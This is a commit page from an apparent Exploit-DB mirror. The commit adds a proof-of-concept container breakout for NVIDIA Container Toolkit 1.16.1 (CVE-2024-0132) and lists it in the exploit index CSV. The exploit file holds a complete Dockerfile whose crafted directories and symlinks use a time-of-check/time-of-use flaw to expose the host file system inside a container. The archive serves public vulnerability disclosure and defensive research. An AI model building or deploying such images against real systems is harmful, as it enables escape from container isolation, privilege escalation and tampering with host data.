bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-03-27

Browse source 
2 changes to exploits/shellcodes/ghdb

NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)
This commit is contained in:
Exploit-DB 2025-03-27 00:16:28 +00:00
parent 51ef1693d4
commit f33b83aeea
2 changed files with 45 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
exploits/linux/local/52095.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
#Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Tooklit 1.16.1
# CVE: CVE-2024-0132
Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a
Time-of-check Time-of-Use (TOCTOU) vulnerability when used with
default configuration where a specifically crafted container image may
gain access to the host file system. This does not impact use cases
where CDI is used. A successful exploit of this vulnerability may lead
to code execution, denial of service, escalation of privileges,
information disclosure, and data tampering.
PoC link: https://github.com/r0binak/CVE-2024-0132
Steps to Reproduce:
Build and run a docker image based on such a Dockerfile:
FROM ubuntu
RUN mkdir -p /usr/local/cuda/compat/
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test >
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../
/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
/usr/local/cuda/compat/libxxx.so.2
The host file system will reside in
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/
Regards,
Sergey `*r0binak*` Kanibor

1
files_exploits.csv
View file

@ -7538,6 +7538,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41356,exploits/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",local,linux,,2017-02-14,2017-02-14,1,CVE-2017-0358,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
41764,exploits/linux/local/41764.txt,"NTP - Local Privilege Escalation",2016-01-21,halfdog,local,linux,,2017-03-29,2017-03-30,0,CVE-2016-0727,,,,,http://www.halfdog.net/Security/2015/NtpCronjobUserNtpToRootPrivilegeEscalation/
45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux,,2018-11-14,2018-11-14,0,CVE-2018-7182,"Out Of Bounds",,,,
52095,exploits/linux/local/52095.txt,"NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)",2025-03-26,r0binak,local,linux,,2025-03-26,2025-03-26,0,CVE-2024-0132,,,,,
2581,exploits/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",local,linux,,2006-10-15,,1,OSVDB-29744;CVE-2006-5379,,,,,http://www.rapid7.com/advisories/R7-0025.jsp
20201,exploits/linux/local/20201.c,"Nvidia Linux Driver - Local Privilege Escalation",2012-08-02,anonymous,local,linux,,2012-08-02,2012-08-02,0,CVE-2012-0946;OSVDB-81332,,,,,
44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,,2018-02-15,2018-02-15,0,CVE-2017-10803,,,,,https://blogs.securiteam.com/index.php/archives/3246

Can't render this file because it is too large.